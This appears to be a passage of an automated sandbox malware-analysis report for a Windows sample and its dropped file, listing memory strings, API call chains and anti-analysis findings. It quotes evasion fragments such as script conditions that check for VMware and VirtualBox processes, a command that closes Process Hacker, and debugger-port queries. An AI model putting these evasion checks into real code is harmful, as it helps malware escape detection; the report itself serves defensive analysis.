                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237826667.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2318771760.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238275486.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000002.2321080150.0000000000E4A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238174115.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238117536.0000000000E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESP
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000085D3000.00000004.00000020.00020000.00000000.sdmp, tdggoffi.bin.7.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0096E rdtsc 14_2_01A0096E
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeWindow / User API: threadDelayed 3788
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeWindow / User API: threadDelayed 6186
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2API coverage: 5.2 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeAPI coverage: 5.2 %
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe TID: 2296Thread sleep count: 135 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe TID: 2296Thread sleep count: 49 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep count: 3788 > 30
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep time: -7576000s >= -30000s
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep count: 6186 > 30
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep time: -12372000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0024F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0024F826
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00261630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00261630
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00271FF8 FindFirstFileExA,0_2_00271FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_008BE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008C9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008CA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_008CA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_008C65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0088C642 FindFirstFileExW,7_2_0088C642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_008C72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C7248 FindFirstFileW,FindClose,7_2_008C7248
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0039E387
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039D836
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039DB69
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003A9F9F
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003AA0FA
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_003AA488
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A65F1 FindFirstFileW,FindNextFileW,FindClose,15_2_003A65F1
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0036C642 FindFirstFileExW,15_2_0036C642
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A7248 FindFirstFileW,FindClose,15_2_003A7248
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_003A72E9
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00264E14 VirtualQuery,GetSystemInfo,0_2_00264E14
                Source: dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exeQ
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2245197297.0000000000DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exet
                Source: tdggoffi.bin.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
                Source: explorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                Source: explorer.exe, 00000020.00000000.3696594073.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C76|OG
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then"w
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2287052991.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exedV
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.1979898615.0000000000D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: explorer.exe, 00000020.00000000.3696594073.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
                Source: tdggoffi.bin.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2256863608.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C71
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2256863608.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
                Source: dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624835426.000000000105B000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625489878.0000000001072000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797287899.000000000172F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796448815.000000000171E000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796850285.0000000001723000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797308782.0000000001734000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796647501.0000000001720000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
                Source: explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
                Source: dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.execroso8
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2237897485.0000000000D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe") Then"
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
                Source: dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then*
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1797532272.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797392869.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797445114.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1874703095.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2290624750.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2287052991.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2269210588.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2283430406.0000000000D93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: tdggoffi.bin.7.dr, tdggoffi.bin.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.1979898615.0000000000D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2319105234.0000000000D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
                Source: dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624388643.0000000001019000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then6a
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe637D6S|
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000020.00000000.3696594073.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                Source: dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe8
                Source: dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenl
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenk
                Source: wscript.exe, 00000002.00000003.1532507557.0000000000A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00aw
                Source: tdggoffi.bin.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then]
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2268745257.0000000000D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe%
                Source: UserAccountControlSettings.exe, 00000016.00000002.3767740843.0000000002D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then%w
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000D97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
                Source: explorer.exe, 00000020.00000002.3833424525.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Thenl
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2319105234.0000000000D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: explorer.exe, 00000020.00000002.3833424525.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
                Source: explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeAPI call chain: ExitProcess graph end nodegraph_0-30220
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0096E rdtsc 14_2_01A0096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00417D83 LdrLoadDll,14_2_00417D83
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CF3FF BlockInput,7_2_008CF3FF
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00266878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00266878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00855D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00855D78
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0026ECAA mov eax, dword ptr fs:[00000030h]0_2_0026ECAA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00875078 mov eax, dword ptr fs:[00000030h]7_2_00875078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BA197 mov eax, dword ptr fs:[00000030h]14_2_019BA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BA197 mov eax, dword ptr fs:[00000030h]14_2_019BA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BA197 mov eax, dword ptr fs:[00000030h]14_2_019BA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A00185 mov eax, dword ptr fs:[00000030h]14_2_01A00185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A64180 mov eax, dword ptr fs:[00000030h]14_2_01A64180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A64180 mov eax, dword ptr fs:[00000030h]14_2_01A64180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7C188 mov eax, dword ptr fs:[00000030h]14_2_01A7C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7C188 mov eax, dword ptr fs:[00000030h]14_2_01A7C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4019F mov eax, dword ptr fs:[00000030h]14_2_01A4019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4019F mov eax, dword ptr fs:[00000030h]14_2_01A4019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4019F mov eax, dword ptr fs:[00000030h]14_2_01A4019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4019F mov eax, dword ptr fs:[00000030h]14_2_01A4019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A961E5 mov eax, dword ptr fs:[00000030h]14_2_01A961E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F01F8 mov eax, dword ptr fs:[00000030h]14_2_019F01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A861C3 mov eax, dword ptr fs:[00000030h]14_2_01A861C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A861C3 mov eax, dword ptr fs:[00000030h]14_2_01A861C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]14_2_01A3E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]14_2_01A3E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E1D0 mov ecx, dword ptr fs:[00000030h]14_2_01A3E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]14_2_01A3E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]14_2_01A3E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov eax, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov ecx, dword ptr fs:[00000030h]14_2_01A6E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6E10E mov eax, dword ptr fs:[00000030h]14_2_01A6E10E
